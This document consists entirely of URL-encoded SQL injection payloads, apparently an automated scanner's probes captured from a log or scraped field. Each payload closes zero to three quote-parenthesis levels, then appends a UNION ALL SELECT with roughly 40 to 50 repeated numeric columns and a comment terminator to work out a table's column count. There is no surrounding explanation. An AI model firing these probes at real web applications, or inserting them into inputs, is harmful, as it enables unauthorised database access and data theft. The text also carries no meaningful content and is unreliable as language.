-6396%27%29%29%20UNION%20ALL%20SELECT%205584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584%2C5584--%20 -2985%27%29%29%20UNION%20ALL%20SELECT%202054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054%2C2054--%20 -1553%27%29%29%20UNION%20ALL%20SELECT%202704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704%2C2704--%20 -7197%27%29%29%20UNION%20ALL%20SELECT%207192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192%2C7192--%20 -2582%27%29%29%20UNION%20ALL%20SELECT%205135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135%2C5135--%20 -6876%27%29%29%20UNION%20ALL%20SELECT%202564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564%2C2564--%20 -5204%27%29%29%20UNION%20ALL%20SELECT%206481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481%2C6481--%20 -7493%27%29%29%29%20UNION%20ALL%20SELECT%206472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472%2C6472--%20 -6892%27%29%29%29%20UNION%20ALL%20SELECT%207407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407%2C7407--%20 -1971%27%29%29%29%20UNION%20ALL%20SELECT%208768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768%2C8768--%20 -1056%27%29%29%29%20UNION%20ALL%20SELECT%203482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482%2C3482--%20 -3071%27%29%29%29%20UNION%20ALL%20SELECT%203856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856%2C3856--%20 -3039%27%29%29%29%20UNION%20ALL%20SELECT%209356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356%2C9356--%20 -1438%27%29%29%29%20UNION%20ALL%20SELECT%201032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032%2C1032--%20 -1045%27%29%29%29%20UNION%20ALL%20SELECT%202615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615%2C2615--%20 -4612%27%29%29%29%20UNION%20ALL%20SELECT%209876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876%2C9876--%20 -9792%27%29%29%29%20UNION%20ALL%20SELECT%202503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503%2C2503--%20 -7725%27%20UNION%20ALL%20SELECT%202057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057%2C2057--%20 -3348%27%20UNION%20ALL%20SELECT%208107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107%2C8107--%20 -7172%27%20UNION%20ALL%20SELECT%203073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073%2C3073--%20 -6188%27%20UNION%20ALL%20SELECT%203023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023%2C3023--%20 -8448%27%20UNION%20ALL%20SELECT%206689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689%2C6689--%20 -3972%27%20UNION%20ALL%20SELECT%201550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550%2C1550--%20 -9866%27%20UNION%20ALL%20SELECT%203378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378%2C3378--%20 -9301%27%20UNION%20ALL%20SELECT%202341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341%2C2341--%20 -5328%27%20UNION%20ALL%20SELECT%207365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365%2C7365--%20 -8288%27%20UNION%20ALL%20SELECT%209230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230%2C9230--%20 -5262%27%29%20UNION%20ALL%20SELECT%207301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301%2C7301--%20 -1011%27%29%20UNION%20ALL%20SELECT%207280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280%2C7280--%20 -7200%27%29%20UNION%20ALL%20SELECT%208433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433%2C8433--%20 -5777%27%29%20UNION%20ALL%20SELECT%202472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472%2C2472--%20 -1115%27%29%20UNION%20ALL%20SELECT%209044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044%2C9044--%20 -1328%27%29%20UNION%20ALL%20SELECT%202071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071%2C2071--%20 -9653%27%29%20UNION%20ALL%20SELECT%202679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679%2C2679--%20 -8382%27%29%20UNION%20ALL%20SELECT%208180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180%2C8180--%20 -6425%27%29%20UNION%20ALL%20SELECT%204184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184%2C4184--%20 -1123%27%29%20UNION%20ALL%20SELECT%202540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540%2C2540--%20 -2020%27%29%29%20UNION%20ALL%20SELECT%202117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117%2C2117--%20 -7872%27%29%29%20UNION%20ALL%20SELECT%206459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459%2C6459--%20 -7907%27%29%29%20UNION%20ALL%20SELECT%207406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406%2C7406--%20 -8613%27%29%29%20UNION%20ALL%20SELECT%206989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989%2C6989--%20 -9500%27%29%29%20UNION%20ALL%20SELECT%209165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165%2C9165--%20 -1604%27%29%29%20UNION%20ALL%20SELECT%208176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176%2C8176--%20 -6480%27%29%29%20UNION%20ALL%20SELECT%208380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380%2C8380--%20 -3594%27%29%29%20UNION%20ALL%20SELECT%208521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521%2C8521--%20 -9498%27%29%29%20UNION%20ALL%20SELECT%208141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141%2C8141--%20 -4668%27%29%29%20UNION%20ALL%20SELECT%209372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372%2C9372--%20 -6313%27%29%29%29%20UNION%20ALL%20SELECT%208628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628%2C8628--%20 -8604%27%29%29%29%20UNION%20ALL%20SELECT%201216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216%2C1216--%20 -5666%27%29%29%29%20UNION%20ALL%20SELECT%209068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068%2C9068--%20 -6152%27%29%29%29%20UNION%20ALL%20SELECT%202981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981%2C2981--%20 -9503%27%29%29%29%20UNION%20ALL%20SELECT%208937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937%2C8937--%20 -9220%27%29%29%29%20UNION%20ALL%20SELECT%207053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053%2C7053--%20 -9727%27%29%29%29%20UNION%20ALL%20SELECT%203366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366%2C3366--%20 -2574%27%29%29%29%20UNION%20ALL%20SELECT%208070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070%2C8070--%20 -5963%27%29%29%29%20UNION%20ALL%20SELECT%201919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919%2C1919--%20 -9405%27%29%29%29%20UNION%20ALL%20SELECT%206825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825%2C6825--%20 -2743%27%20UNION%20ALL%20SELECT%203357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357%2C3357--%20 -7786%27%20UNION%20ALL%20SELECT%205878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878%2C5878--%20 